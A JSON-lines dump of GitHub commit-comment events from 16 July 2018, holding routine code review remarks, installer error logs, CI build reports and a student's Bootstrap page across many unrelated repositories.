{"id":"7972383593","type":"CommitCommentEvent","actor":{"login":"scls19fr"},"repo":{"name":"frictionlessdata/datapackage-jl"},"payload":{"comment":{"id":29725060,"position":4,"line":10,"path":"src/package.jl","commit_id":"6e22d3aa9958b4a2531eccb1e2453c7cf7a8aa54","created_at":"2018-07-16T19:07:03Z","updated_at":"2018-07-16T19:07:03Z","author_association":"NONE","body":"I think it should be\r\n\r\n    resources::Vector{Schema}"}},"created_at":"2018-07-16T19:07:03Z"}
{"id":"7972384505","type":"CommitCommentEvent","actor":{"login":"scls19fr"},"repo":{"name":"frictionlessdata/datapackage-jl"},"payload":{"comment":{"id":29725063,"position":4,"line":10,"path":"src/package.jl","commit_id":"6e22d3aa9958b4a2531eccb1e2453c7cf7a8aa54","created_at":"2018-07-16T19:07:14Z","updated_at":"2018-07-16T19:07:14Z","author_association":"NONE","body":"same for errors"}},"created_at":"2018-07-16T19:07:14Z"}
{"id":"7972385473","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29725067,"position":null,"line":null,"path":null,"commit_id":"4dad69dd17f0f00127438dbc2f080895253e36fd","created_at":"2018-07-16T19:07:26Z","updated_at":"2018-07-16T19:07:26Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-46](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-46-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-16T19:07:26Z"}
{"id":"7972387417","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29725072,"position":null,"line":null,"path":null,"commit_id":"83ba1c0292b16061b4d6d9dfd10dbaab02b75659","created_at":"2018-07-16T19:07:50Z","updated_at":"2018-07-16T19:07:50Z","author_association":"CONTRIBUTOR","body":":blobcat:"}},"created_at":"2018-07-16T19:07:50Z"}
{"id":"7972393578","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29725075,"position":24,"line":24,"path":"StudentIQ-boot/src/test/java/ru/otus/elena/studentiqtest/acquaintance/AcquaintanceImplTest.java","commit_id":"1e9146214092701f2ff8f61d95887dad1febea9a","created_at":"2018-07-16T19:09:02Z","updated_at":"2018-07-16T19:09:02Z","author_association":"NONE","body":"Вот лучше это тогда не добавлять. Если не проверять автоматически."}},"created_at":"2018-07-16T19:09:02Z"}
{"id":"7972393751","type":"CommitCommentEvent","actor":{"login":"LobeM"},"repo":{"name":"LobeM/WeatherApp"},"payload":{"comment":{"id":29725076,"position":null,"line":null,"path":null,"commit_id":"652672d019a5180ee1668b8b78d5c00223fd5b63","created_at":"2018-07-16T19:09:04Z","updated_at":"2018-07-16T19:09:04Z","author_association":"OWNER","body":"changes completed"}},"created_at":"2018-07-16T19:09:04Z"}
{"id":"7972394005","type":"CommitCommentEvent","actor":{"login":"panva"},"repo":{"name":"idandtrust/node-openid-client"},"payload":{"comment":{"id":29725078,"position":5,"line":539,"path":"lib/client.js","commit_id":"a7bb75710f577a09d5dad49dea7d24def1497b8f","created_at":"2018-07-16T19:09:08Z","updated_at":"2018-07-16T19:09:08Z","author_association":"NONE","body":"Are you using https://self-issued.me as issuer?"}},"created_at":"2018-07-16T19:09:08Z"}
{"id":"7972395320","type":"CommitCommentEvent","actor":{"login":"vynmera"},"repo":{"name":"vynmera/Rocket.Chat"},"payload":{"comment":{"id":29725086,"position":null,"line":null,"path":null,"commit_id":"47fa5ede8a201cc722ba1a9b8edc341378780ef4","created_at":"2018-07-16T19:09:24Z","updated_at":"2018-07-16T19:09:24Z","author_association":"OWNER","body":"This may need to be discussed further with the community."}},"created_at":"2018-07-16T19:09:24Z"}
{"id":"7972395834","type":"CommitCommentEvent","actor":{"login":"MarceloProjetos"},"repo":{"name":"letscontrolit/ESPEasy"},"payload":{"comment":{"id":29725087,"position":null,"line":null,"path":null,"commit_id":"787c1c6c39d42baf7bdfc44415b0a3b4d02e31bd","created_at":"2018-07-16T19:09:30Z","updated_at":"2018-07-16T19:09:30Z","author_association":"NONE","body":"Now it's better to work with \"MQTT\" congratulations on the project!"}},"created_at":"2018-07-16T19:09:30Z"}
{"id":"7972396958","type":"CommitCommentEvent","actor":{"login":"Deepaktogarla"},"repo":{"name":"Deepaktogarla/summerschool2018"},"payload":{"comment":{"id":29725089,"position":null,"line":null,"path":null,"commit_id":"9ad1f771905c0f724bc63cebe9dfb337e5a528b5","created_at":"2018-07-16T19:09:43Z","updated_at":"2018-07-16T19:09:43Z","author_association":"OWNER","body":"[https://www.w3schools.com/code/tryit.asp?filename=FTCAR7S5Y5K0](url)"}},"created_at":"2018-07-16T19:09:43Z"}
{"id":"7972398193","type":"CommitCommentEvent","actor":{"login":"scls19fr"},"repo":{"name":"frictionlessdata/datapackage-jl"},"payload":{"comment":{"id":29725094,"position":8,"line":13,"path":"src/package.jl","commit_id":"6e22d3aa9958b4a2531eccb1e2453c7cf7a8aa54","created_at":"2018-07-16T19:10:00Z","updated_at":"2018-07-16T19:10:00Z","author_association":"NONE","body":"Bad idea... Julia is not Python...\r\n\r\n    julia> resources = []\r\n    0-element Array{Any,1}\r\n\r\nit should be\r\n\r\n    julia> Array{Schema,1}()\r\n    0-element Array{Schema,1}\r\n\r\nor\r\n\r\n    julia> Vector{Schema}()\r\n    0-element Array{Schema,1}\r\n\r\nor simply\r\n\r\n    julia> Schema[]\r\n\r\nSee https://docs.julialang.org/en/stable/manual/performance-tips/"}},"created_at":"2018-07-16T19:10:00Z"}
{"id":"7972400223","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29725096,"position":22,"line":379,"path":"Applications/spire/source/time_and_sales/time_and_sales_properties_dialog.cpp","commit_id":"af94d1c562ce90357897b83812d3bcb38dda9b69","created_at":"2018-07-16T19:10:25Z","updated_at":"2018-07-16T19:10:25Z","author_association":"COLLABORATOR","body":"This won't work, every time you modify the colors you're re-appending the entire stylesheet quadratically."}},"created_at":"2018-07-16T19:10:25Z"}
{"id":"7972401692","type":"CommitCommentEvent","actor":{"login":"Deepaktogarla"},"repo":{"name":"Deepaktogarla/summerschool2018"},"payload":{"comment":{"id":29725099,"position":null,"line":null,"path":null,"commit_id":"9ad1f771905c0f724bc63cebe9dfb337e5a528b5","created_at":"2018-07-16T19:10:43Z","updated_at":"2018-07-16T19:10:43Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html>\r\n<head>\r\n\r\n<link rel=\"stylesheet\" href=\"https://stackpath.bootstrapcdn.com/bootstrap/4.1.2/css/bootstrap.min.css\" integrity=\"sha384-Smlep5jCw/wG7hdkwQ/Z5nLIefveQRIY9nfy6xoR1uRYBtpZgI6339F5dgvm/e9B\" crossorigin=\"anonymous\">\r\n<script src=\"https://code.jquery.com/jquery-3.3.1.slim.min.js\" integrity=\"sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo\" crossorigin=\"anonymous\"></script>\r\n<script src=\"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js\" integrity=\"sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49\" crossorigin=\"anonymous\"></script>\r\n<script src=\"https://stackpath.bootstrapcdn.com/bootstrap/4.1.2/js/bootstrap.min.js\" integrity=\"sha384-o+RDsa0aLu++PJvFqy8fFScvbHFLtbvScb8AjopnFD+iEQ7wo/CG0xlczd+2O/em\" crossorigin=\"anonymous\"></script>\r\n\r\n</head>\r\n<body>\r\n<div class=\"accordion\" id=\"accordionExample\">\r\n  <div class=\"card\">\r\n    <div class=\"card-header\" id=\"headingOne\">\r\n      <h5 class=\"mb-0\">\r\n        <button class=\"btn btn-warning\" type=\"button\" data-toggle=\"collapse\" data-target=\"#collapseOne\" aria-expanded=\"true\" aria-controls=\"collapseOne\">\r\n       Name\r\n        </button>\r\n      </h5>\r\n    </div>\r\n\r\n    <div id=\"collapseOne\" class=\"collapse show\" aria-labelledby=\"headingOne\" data-parent=\"#accordionExample\">\r\n      <div class=\"card-body\">\r\n        Deepak Togarla  </div>\r\n    </div>\r\n  </div>\r\n  <div class=\"card\">\r\n    <div class=\"card-header\" id=\"headingTwo\">\r\n      <h5 class=\"mb-0\">\r\n        <button class=\"btn btn-danger\" type=\"button\" data-toggle=\"collapse\" data-target=\"#collapseTwo\" aria-expanded=\"false\" aria-controls=\"collapseTwo\">\r\n          Biggest challenge so far\r\n        </button>\r\n      </h5>\r\n    </div>\r\n    <div id=\"collapseTwo\" class=\"collapse\" aria-labelledby=\"headingTwo\" data-parent=\"#accordionExample\">\r\n      <div class=\"card-body\">\r\n       I worked in developing a responsive website for a company as a part of my studies.I had very low knowledge during that project.I learned front end developing through that project.But my main problem was understanding backend  because we used symfony+php+mysqlDB during backend (i had no idea during that project)\r\n      \r\n      later on i learned some basics and thought why we should stick to them we can also use Java script+mongooseDB+Express .I believe there are many ways  to complete that project(full stack developing a website)\r\n       \r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div class=\"card\">\r\n    <div class=\"card-header\" id=\"headingThree\">\r\n      <h5 class=\"mb-0\">\r\n        <button class=\"btn btn-success\" type=\"button\" data-toggle=\"collapse\" data-target=\"#collapseThree\" aria-expanded=\"false\" aria-controls=\"collapseThree\">\r\n          Why this course??\r\n        </button>\r\n      </h5>\r\n    </div>\r\n    <div id=\"collapseThree\" class=\"collapse\" aria-labelledby=\"headingThree\" data-parent=\"#accordionExample\">\r\n      <div class=\"card-body\">\r\n      After my project i thought why can't i learn many technologies and apply them (After i learn many things).I feel your 2 week course might help me to become a successful full stack developer \r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>\r\n</body>\r\n</html>\r\n"}},"created_at":"2018-07-16T19:10:43Z"}
{"id":"7972403595","type":"CommitCommentEvent","actor":{"login":"spireken"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29725101,"position":22,"line":379,"path":"Applications/spire/source/time_and_sales/time_and_sales_properties_dialog.cpp","commit_id":"af94d1c562ce90357897b83812d3bcb38dda9b69","created_at":"2018-07-16T19:11:06Z","updated_at":"2018-07-16T19:11:06Z","author_association":"COLLABORATOR","body":"Yeah, I just realized that."}},"created_at":"2018-07-16T19:11:06Z"}
{"id":"7972405964","type":"CommitCommentEvent","actor":{"login":"1990b"},"repo":{"name":"corbin-coleman/holbertonschool-higher_level_programming"},"payload":{"comment":{"id":29725103,"position":null,"line":null,"path":null,"commit_id":"2f09b2b7c49329df559ae7c53fd68704a377550c","created_at":"2018-07-16T19:11:35Z","updated_at":"2018-07-16T19:11:35Z","author_association":"NONE","body":"What is about"}},"created_at":"2018-07-16T19:11:35Z"}
{"id":"7972411055","type":"CommitCommentEvent","actor":{"login":"bryanhuntesl"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":29725115,"position":31,"line":818,"path":"src/riak_core_vnode_manager.erl","commit_id":"148598d93003c44986ffd995100d66592b1f8949","created_at":"2018-07-16T19:12:39Z","updated_at":"2018-07-16T19:12:39Z","author_association":"NONE","body":"How come we're getting the same value twice ? "}},"created_at":"2018-07-16T19:12:39Z"}
{"id":"7972419832","type":"CommitCommentEvent","actor":{"login":"1990b"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29725136,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T19:14:28Z","updated_at":"2018-07-16T19:14:28Z","author_association":"NONE","body":"What results it's giving?\r\n"}},"created_at":"2018-07-16T19:14:28Z"}
{"id":"7972421463","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29725141,"position":null,"line":null,"path":null,"commit_id":"391e683d9adafc6c0dd1a0480d1001ee932a4691","created_at":"2018-07-16T19:14:47Z","updated_at":"2018-07-16T19:14:47Z","author_association":"NONE","body":"Might want to check line 998, since the move been played, it will always be false"}},"created_at":"2018-07-16T19:14:47Z"}
{"id":"7972421734","type":"CommitCommentEvent","actor":{"login":"nickjoodi"},"repo":{"name":"noon99jaki/pra"},"payload":{"comment":{"id":29725142,"position":9,"line":62,"path":"edu/cmu/pra/model/Query.java","commit_id":"22759e5966fe68ef28a48ed4ae98f5832dd5b73f","created_at":"2018-07-16T19:14:50Z","updated_at":"2018-07-16T19:14:50Z","author_association":"COLLABORATOR","body":"No problem. Added it back in."}},"created_at":"2018-07-16T19:14:50Z"}
{"id":"7972426410","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29725151,"position":null,"line":null,"path":null,"commit_id":"53c3ba3e44f0205ed0a9bc6db8588adeef7f0225","created_at":"2018-07-16T19:15:47Z","updated_at":"2018-07-16T19:15:47Z","author_association":"CONTRIBUTOR","body":"Ай, не бери с меня пример. Так нельзя, по хорошему. Надо сами функции править. "}},"created_at":"2018-07-16T19:15:47Z"}
{"id":"7972426658","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"atonomi/smart-contracts"},"payload":{"comment":{"id":29725152,"position":null,"line":null,"path":null,"commit_id":"ab1c5eab936709ac7ee2b8b7b36fbd1aa9feced7","created_at":"2018-07-16T19:15:50Z","updated_at":"2018-07-16T19:15:50Z","author_association":"CONTRIBUTOR","body":"And are you using it in the controller?"}},"created_at":"2018-07-16T19:15:50Z"}
{"id":"7972428858","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29725153,"position":null,"line":null,"path":null,"commit_id":"b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a","created_at":"2018-07-16T19:16:16Z","updated_at":"2018-07-16T19:16:16Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-MacOS-10.9-clang: OK (2942 of 2943 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-16T19:16:16Z"}
{"id":"7972432632","type":"CommitCommentEvent","actor":{"login":"dankellymn"},"repo":{"name":"intendia-oss/autorest"},"payload":{"comment":{"id":29725162,"position":5,"line":53,"path":"core/src/main/java/com/intendia/gwt/autorest/client/CollectorResourceVisitor.java","commit_id":"1e06d2fbd78fd83d6576c403288f1caa6964f29f","created_at":"2018-07-16T19:17:02Z","updated_at":"2018-07-16T19:17:02Z","author_association":"NONE","body":"I'm either not understanding how paths build, or the building code has an issue to work around then.\r\n\r\nMy problem is that I'm seeing double /'s in constructed paths when I want to have the api served directly from the host. if I create an api like:\r\nfinal TestApi api = new TestApi_RestServiceModel(() -> new RequestResourceBuilder()\r\n                .path(\"https://foo.com\"));\r\nand have TestApi annotated @Path(\"/\") or @Path(\"\") for that matter\r\nand have a operation annotated @Path(\"/Session\")\r\nthen the request gets sent to: https://foo.com//Session when it really should be https://foo.com/Session\r\n\r\nI suppose another option would be to allow a class annotated with @AutoRestGwt to be generated when it has no base @Path (right now it NPEs)"}},"created_at":"2018-07-16T19:17:02Z"}
{"id":"7972432807","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29725163,"position":40,"line":45,"path":"src/app/components/dialog/dialog.component.scss","commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-16T19:17:05Z","updated_at":"2018-07-16T19:17:05Z","author_association":"NONE","body":"Не получится это тоже из `\"../../../../node_modules/font-awesome/scss/variables\"` импортировать?"}},"created_at":"2018-07-16T19:17:05Z"}
{"id":"7972433372","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29725164,"position":null,"line":null,"path":null,"commit_id":"415bb5b194100b7e4376c192e4a56bb0e5f1ac29","created_at":"2018-07-16T19:17:13Z","updated_at":"2018-07-16T19:17:13Z","author_association":"CONTRIBUTOR","body":"Пфф, если сможешь в окси отправить,буду признателен. Я хз сколько без ПК буду. А потом я на это забью. "}},"created_at":"2018-07-16T19:17:13Z"}
{"id":"7972440135","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29725171,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-16T19:18:37Z","updated_at":"2018-07-16T19:18:37Z","author_association":"MEMBER","body":"Are you sure we never added parameters to messages? I suppose we did many times."}},"created_at":"2018-07-16T19:18:37Z"}
{"id":"7972444257","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29725183,"position":9,"line":9,"path":"src/app/components/growl/growl.module.ts","commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-16T19:19:31Z","updated_at":"2018-07-16T19:19:31Z","author_association":"NONE","body":"Давай переименуем `GrowlMasterComponent` -> `GrowlComponent`"}},"created_at":"2018-07-16T19:19:31Z"}
{"id":"7972447443","type":"CommitCommentEvent","actor":{"login":"wally666"},"repo":{"name":"tzapu/WiFiManager"},"payload":{"comment":{"id":29725210,"position":null,"line":null,"path":null,"commit_id":"9ab4deaf5bf0ff8163875a22f024a018f62f19e8","created_at":"2018-07-16T19:20:14Z","updated_at":"2018-07-16T19:20:14Z","author_association":"NONE","body":"It generates following error:\r\n\r\nerror: 'deflength' was not declared in this scope\r\n\r\n   deflength = strlen(defaultValue); // length actual"}},"created_at":"2018-07-16T19:20:14Z"}
{"id":"7972450673","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29725219,"position":10,"line":9,"path":"src/app/showcase/growl-showcase/growl-showcase.component.html","commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-16T19:20:51Z","updated_at":"2018-07-16T19:20:51Z","author_association":"NONE","body":"`msg` лучше переименовать в `messages`"}},"created_at":"2018-07-16T19:20:51Z"}
{"id":"7972452786","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29725234,"position":10,"line":9,"path":"src/app/showcase/growl-showcase/growl-showcase.component.html","commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-16T19:21:17Z","updated_at":"2018-07-16T19:21:17Z","author_association":"NONE","body":"`class=\"growl-master\"` - А это точно нужно?"}},"created_at":"2018-07-16T19:21:17Z"}
{"id":"7972453338","type":"CommitCommentEvent","actor":{"login":"Xavier251998"},"repo":{"name":"CuteLunaMoon/Survival-Pixel-Dungeon"},"payload":{"comment":{"id":29725240,"position":null,"line":null,"path":null,"commit_id":"f19f961fd96a05cea7ac60f7fbafaf0e7d78b7fa","created_at":"2018-07-16T19:21:23Z","updated_at":"2018-07-16T19:21:23Z","author_association":"NONE","body":"You can. do anything!"}},"created_at":"2018-07-16T19:21:23Z"}
{"id":"7972458282","type":"CommitCommentEvent","actor":{"login":"bahaaaldin214"},"repo":{"name":"dnschneid/crouton"},"payload":{"comment":{"id":29725283,"position":null,"line":null,"path":null,"commit_id":"f80b8bb628953510a2f59606b2ee6015daa985e5","created_at":"2018-07-16T19:22:15Z","updated_at":"2018-07-16T19:22:15Z","author_association":"NONE","body":"Installing xenial-amd64 chroot to /usr/local/chroots/xenial\r\n################################################################################################################################################################### 100.0%\r\nPatching debootstrap...\r\nDownloading bootstrap files...\r\nE: You must install wget to download packages.\r\ndebootstrap error log:\r\ntail: cannot open '/tmp/crouton.dlj/xenial-amd64/debootstrap/debootstrap.log' for reading: No such file or directory\r\nFailed to run debootstrap."}},"created_at":"2018-07-16T19:22:15Z"}
{"id":"7972463060","type":"CommitCommentEvent","actor":{"login":"Nekto89"},"repo":{"name":"boostorg/serialization"},"payload":{"comment":{"id":29725315,"position":25,"line":194,"path":"src/basic_xml_grammar.ipp","commit_id":"64dc62099238a44341132d7cd4e237d1c1004020","created_at":"2018-07-16T19:23:13Z","updated_at":"2018-07-16T19:23:13Z","author_association":"NONE","body":"Code checks for failbit before eofbit and exception is thrown every time when input stream is still alive.\r\n~xml_iarchive_impl -> basic_xml_grammar<CharType>::windup(IStream & is) -> basic_xml_grammar<CharType>::my_parse\r\n#99 \r\n\r\n"}},"created_at":"2018-07-16T19:23:13Z"}
{"id":"7972467150","type":"CommitCommentEvent","actor":{"login":"JEBABOT"},"repo":{"name":"JEBABOT/MUVUKA-BOT"},"payload":{"comment":{"id":29725328,"position":null,"line":null,"path":null,"commit_id":"6b48c4bbbd66a00f7f4f15c3cac3d6265b254d96","created_at":"2018-07-16T19:24:02Z","updated_at":"2018-07-16T19:24:02Z","author_association":"OWNER","body":"KK"}},"created_at":"2018-07-16T19:24:02Z"}
{"id":"7972495925","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29725393,"position":29,"line":29,"path":"src/main/java/com/crud/tasks/scheduler/EmalScheduler.java","commit_id":"94d42d403a920bde31a1786ac39ed04c7af61e04","created_at":"2018-07-16T19:30:05Z","updated_at":"2018-07-16T19:30:05Z","author_association":"NONE","body":"Dwa razy jest podobny kod. Postaraj się tego uniknąć. Możesz np utworzyć dodatkową zmienną"}},"created_at":"2018-07-16T19:30:05Z"}
{"id":"7972499637","type":"CommitCommentEvent","actor":{"login":"getinthefridge"},"repo":{"name":"dnschneid/crouton"},"payload":{"comment":{"id":29725399,"position":null,"line":null,"path":null,"commit_id":"f80b8bb628953510a2f59606b2ee6015daa985e5","created_at":"2018-07-16T19:30:52Z","updated_at":"2018-07-16T19:30:52Z","author_association":"NONE","body":"Same as above\r\n\r\n################################################################################################################################################ 100.0%\r\nPatching debootstrap...\r\nDownloading bootstrap files...\r\nE: You must install wget to download packages.\r\ndebootstrap error log:\r\ntail: cannot open '/tmp/crouton.APe/xenial-amd64/debootstrap/debootstrap.log' for reading: No such file or directory\r\nFailed to run debootstrap."}},"created_at":"2018-07-16T19:30:52Z"}
{"id":"7972503752","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29725417,"position":null,"line":null,"path":null,"commit_id":"ad6fac17a551ea85fa9804b6da7a6bbc5fc8eace","created_at":"2018-07-16T19:31:45Z","updated_at":"2018-07-16T19:31:45Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-286](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-286).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-286-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-16T19:31:45Z"}
{"id":"7972510890","type":"CommitCommentEvent","actor":{"login":"papandreou"},"repo":{"name":"jsforce/jsforce"},"payload":{"comment":{"id":29725423,"position":null,"line":null,"path":null,"commit_id":"4128a29bd028f99350b52068deffe5c4732a9988","created_at":"2018-07-16T19:33:11Z","updated_at":"2018-07-16T19:33:11Z","author_association":"NONE","body":"Remember to push the `v1.8.4` tag :)"}},"created_at":"2018-07-16T19:33:11Z"}
{"id":"7972512552","type":"CommitCommentEvent","actor":{"login":"filcap"},"repo":{"name":"atonomi/smart-contracts"},"payload":{"comment":{"id":29725432,"position":null,"line":null,"path":null,"commit_id":"ab1c5eab936709ac7ee2b8b7b36fbd1aa9feced7","created_at":"2018-07-16T19:33:30Z","updated_at":"2018-07-16T19:33:30Z","author_association":"MEMBER","body":"Yes, pull for that is coming soon"}},"created_at":"2018-07-16T19:33:30Z"}
{"id":"7972513701","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29725433,"position":null,"line":null,"path":null,"commit_id":"b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a","created_at":"2018-07-16T19:33:45Z","updated_at":"2018-07-16T19:33:45Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T19:33:45Z"}
{"id":"7972514765","type":"CommitCommentEvent","actor":{"login":"NicolaasFerro"},"repo":{"name":"NicolaasFerro/NicolaasFerro.github.io"},"payload":{"comment":{"id":29725435,"position":35,"line":35,"path":"index.html","commit_id":"d9c53fdfdce8f4326ad87ca47258b73df1283a04","created_at":"2018-07-16T19:33:58Z","updated_at":"2018-07-16T19:33:58Z","author_association":"OWNER","body":"afda"}},"created_at":"2018-07-16T19:33:58Z"}
{"id":"7972520077","type":"CommitCommentEvent","actor":{"login":"jberrysbc"},"repo":{"name":"jberrysbc/Dev1"},"payload":{"comment":{"id":29725444,"position":null,"line":null,"path":null,"commit_id":"b080042643c1cc09b40a818610964308e293c924","created_at":"2018-07-16T19:35:03Z","updated_at":"2018-07-16T19:35:03Z","author_association":"OWNER","body":"Here is a comment"}},"created_at":"2018-07-16T19:35:03Z"}
{"id":"7972523779","type":"CommitCommentEvent","actor":{"login":"maximecb"},"repo":{"name":"duckietown/gym-duckietown"},"payload":{"comment":{"id":29725451,"position":32,"line":32,"path":"Dockerfile","commit_id":"193f8ead54bbe11ee6665d3e086ef41b71dc8e05","created_at":"2018-07-16T19:35:50Z","updated_at":"2018-07-16T19:35:50Z","author_association":"COLLABORATOR","body":"Back when I wrote the README you couldn't install pytorch with cudnn that way. We should probably update the readme to just point people to the pytorch site instead of telling them how to install it?"}},"created_at":"2018-07-16T19:35:50Z"}
{"id":"7972534147","type":"CommitCommentEvent","actor":{"login":"knight-of-ni"},"repo":{"name":"ZoneMinder/zmdockerfiles"},"payload":{"comment":{"id":29725469,"position":13,"line":187,"path":"utils/entrypoint.sh","commit_id":"6d20d4d7f3c125794ad39f50a2256b143cf8d584","created_at":"2018-07-16T19:37:59Z","updated_at":"2018-07-16T19:37:59Z","author_association":"MEMBER","body":"The mysqld binary does not exist on redhat distros."}},"created_at":"2018-07-16T19:37:59Z"}
{"id":"7972537151","type":"CommitCommentEvent","actor":{"login":"knight-of-ni"},"repo":{"name":"ZoneMinder/zmdockerfiles"},"payload":{"comment":{"id":29725472,"position":14,"line":187,"path":"utils/entrypoint.sh","commit_id":"6d20d4d7f3c125794ad39f50a2256b143cf8d584","created_at":"2018-07-16T19:38:39Z","updated_at":"2018-07-16T19:38:39Z","author_association":"MEMBER","body":"Use mysql_install_db binary instead because it exists on both redhat & debian distros"}},"created_at":"2018-07-16T19:38:39Z"}
{"id":"7972548587","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29725498,"position":12,"line":12,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-16T19:41:04Z","updated_at":"2018-07-16T19:41:04Z","author_association":"NONE","body":"I prefer to not prefix the method with `test`. Why? There's already \"test\" everywhere, it's pretty clear this is a test: we're in the `tests` directory, the class is named \"Test\", the class extends a \"TestCase\", and the method is annotated with `@test`. How much \"test\" do we need? None. It just gets in the way, making conveying ideas more difficult.\r\n\r\nCode is supposed to convey ideas.\r\n\r\nSpeaking of conveying ideas: I like to read sentences easily. So instead of `testStartTheGameWithAnEmptyMapTheCurrentPlayerBeingX`, why not use `_` to separate words in the sentence? It's way easier to read, direct visual queues of where words start and end, I don't have to focus. So better:\r\n\r\n`start_the_game_with_an_empty_map_the_current_player_being_x`.\r\n\r\nYes, there are rules which you are breaking, the biggest you're breaking is the consistency: production code follows one notation, and tests follow another notation.\r\n\r\nThis is a situation in which it makes sense to break the rules: you're fully aware of the downsides and of the upsides, and you consciously decide to do it, fully in control of the matter.\r\n\r\nYou can even go one step further and create a document `docs/coding_guidelines.md` in which you write down this decision (the rule in a sentence, and a link to this comment for further details)."}},"created_at":"2018-07-16T19:41:04Z"}
